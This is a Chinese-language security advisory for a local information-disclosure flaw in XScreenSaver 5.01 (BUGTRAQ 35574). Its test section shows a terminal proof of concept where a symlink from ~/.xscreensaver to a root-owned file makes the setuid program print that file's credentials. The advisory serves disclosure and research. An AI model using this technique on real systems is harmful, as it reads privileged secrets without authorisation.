受影响系统:
Jamie Zawinski XScreenSaver 5.01
描述:
BUGTRAQ ID: 35574
XScreenSaver是X窗口系统的一套屏保程序和屏保框架。
Xscreensaver程序使用~/.xscreensaver文件读取配置选项。如果这个文件是指向其他文件的符号链接,在解析这个文件时就可能显示该文件的内容。
<*来源:Nikolaos Rangos
链接:http://milw0rm.com/exploits/9097
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
kcope@opensolaris:~# ls -la /root/db.php && cat /root/db.php
-rw——- 1 root root 61 Dez 27 17:59 /root/db.php
$db_user = "root";
$db_pass = "secret";
kcope@opensolaris:~$ ln -s /root/db.php ~/.xscreensaver
kcope@opensolaris:~$ ls -la ~/.xscreensaver
lrwxrwxrwx 1 kcope staff 12 1986-12-27 18:01 /export/home/kcope/.xscreensaver -> /root/db.php
kcope@opensolaris:~$ xscreensaver -verbose
xscreensaver 5.01, copyright (c) 1991-2006 by Jamie Zawinski <jwz@jwz.org>.
xscreensaver: running as kcope/staff (101/10); effectively root/staff (0/10)
xscreensaver: in process 2186.
xscreensaver: /export/home/kcope/.xscreensaver:1: unparsable line: $db_user = "root";
xscreensaver: /export/home/kcope/.xscreensaver:2: unparsable line: $db_pass = "secret";
xscreensaver: 18:02:26: running /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper: No such file or directory
xscreensaver: 18:02:26: /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper did not report a GL visual!
……………………………
……………………………
……………………………
可见在xscreensaver输出中显示了属于root的db.php文件的内容。
建议:
厂商补丁:
Jamie Zawinski
————–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。